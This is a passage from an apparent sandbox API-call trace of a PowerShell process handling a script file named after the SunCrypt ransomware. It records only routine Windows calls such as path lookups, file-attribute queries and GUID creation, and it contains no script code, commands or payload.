lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.813] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701462983646) returned 1 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.813] EtwEventActivityIdControl () returned 0x0 [0101.815] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x4e76a9eb, Data2=0x690b, Data3=0x45e6, Data4=([0]=0x9d, [1]=0x79, [2]=0x80, [3]=0x10, [4]=0x64, [5]=0xca, [6]=0xac, [7]=0x55))) returned 0x0 [0101.815] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.815] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.815] CoTaskMemFree (pv=0x4280e80) [0101.815] EtwEventActivityIdControl () returned 0x0 [0101.815] EtwEventActivityIdControl () returned 0x0 [0101.815] EtwEventActivityIdControl () returned 0x0 [0101.816] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe87c | out: lpPerformanceCount=0x4ebe87c*=1701463248520) returned 1 [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.816] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.816] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.819] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701463565253) returned 1 [0101.846] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x9b672af4, Data2=0x6125, Data3=0x4ac4, Data4=([0]=0xba, [1]=0x83, [2]=0x76, [3]=0x54, [4]=0xee, [5]=0xd3, [6]=0x6, [7]=0xad))) returned 0x0 [0101.849] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.849] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.849] CoTaskMemFree (pv=0x4280e80) [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.849] EtwEventActivityIdControl () returned 0x0 [0101.850] EtwEventActivityIdControl () returned 0x0 [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.889] EtwEventActivityIdControl () returned 0x0 [0101.945] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x57e68fc3, Data2=0xa75e, Data3=0x492e, Data4=([0]=0x82, [1]=0xad, [2]=0x31, [3]=0x73, [4]=0xd7, [5]=0x8, [6]=0xa6, [7]=0x1c))) returned 0x0 [0101.946] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.946] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.946] CoTaskMemFree (pv=0x4280e80) [0101.946] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701476292414) returned 1 [0101.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.949] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701476561438) returned 1 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.949] EtwEventActivityIdControl () returned 0x0 [0101.950] EtwEventActivityIdControl () returned 0x0 [0101.950] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xbd0ddf7f, Data2=0x48c2, Data3=0x43c9, Data4=([0]=0x93, [1]=0xf, [2]=0x3f, [3]=0x79, [4]=0x17, [5]=0xe7, [6]=0x24, [7]=0xe3))) returned 0x0 [0101.951] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.951] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.951] CoTaskMemFree (pv=0x4280e80) [0101.951] EtwEventActivityIdControl () returned 0x0 [0101.951] EtwEventActivityIdControl () returned 0x0 [0101.951] EtwEventActivityIdControl () returned 0x0 [0101.952] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701476815898) returned 1 [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.952] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.954] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701477090666) returned 1 [0102.212] EtwEventActivityIdControl () returned 0x0 [0102.215] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf84bca5f, Data2=0x26f8, Data3=0x441a, Data4=([0]=0x90, [1]=0x80, [2]=0x38, [3]=0x66, [4]=0xc9, [5]=0x35, [6]=0x2d, [7]=0x4))) returned 0x0 [0102.215] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.215] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.215] CoTaskMemFree (pv=0x4280e80) [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.216] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] EtwEventActivityIdControl () returned 0x0 [0102.217] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xed6c1487, Data2=0x7067, Data3=0x4318, Data4=([0]=0xa8, [1]=0x5a, [2]=0xe9, [3]=0x39, [4]=0xac, [5]=0x69, [6]=0xfa, [7]=0x3e))) returned 0x0 [0102.217] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.217] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.217] CoTaskMemFree (pv=0x4280e80) [0102.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.223] EtwEventActivityIdControl () returned 0x0 [0102.224] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0xcb1f8154, Data2=0x40c1, Data3=0x461f, Data4=([0]=0x8a, [1]=0x12, [2]=0x67, [3]=0xd0, [4]=0xeb, [5]=0x93, [6]=0x9b, [7]=0xca))) returned 0x0 [0102.224] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.224] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.224] CoTaskMemFree (pv=0x4280e80) [0102.224] EtwEventActivityIdControl () returned 0x0 [0102.224] EtwEventActivityIdControl () returned 0x0 [0102.225] EtwEventActivityIdControl () returned 0x0 [0102.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0102.225] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0102.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.305] EtwEventActivityIdControl () returned 0x0 [0102.353] EtwEventActivityIdControl () returned 0x0 [0102.353] EtwEventActivityIdControl () returned 0x0 [0102.353] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc764e2c8, Data2=0xb201, Data3=0x49d8, Data4=([0]=0x9d, [1]=0x80, [2]=0x4c, [3]=0x26, [4]=0x9e, [5]=0x90, [6]=0xc3, [7]=0xcc))) returned 0x0 [0102.353] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.353] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.353] CoTaskMemFree (pv=0x4280e80) [0102.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.355] EtwEventActivityIdControl () returned 0x0 [0102.356] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7edd0a1e, Data2=0xa1ed, Data3=0x4cbe, Data4=([0]=0x86, [1]=0x96, [2]=0xbe, [3]=0xe2, [4]=0x20, [5]=0x15, [6]=0xf2, [7]=0x81))) returned 0x0 [0102.356] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.356] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.356] CoTaskMemFree (pv=0x4280e80) [0102.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0102.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0102.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0102.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0102.357] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.357] EtwEventActivityIdControl () returned 0x0 [0102.358] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0x832849b5, Data2=0x9536, Data3=0x4b34, Data4=([0]=0x9b, [1]=0x72, [2]=0x32, [3]=0xeb, [4]=0xe4, [5]=0x5e, [6]=0x66, [7]=0x72))) returned 0x0 [0102.358] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0102.358] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0102.358] CoTaskMemFree (pv=0x4280e80) [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.358] EtwEventActivityIdControl () returned 0x0 [0102.359] GetFullPathNameW (in: 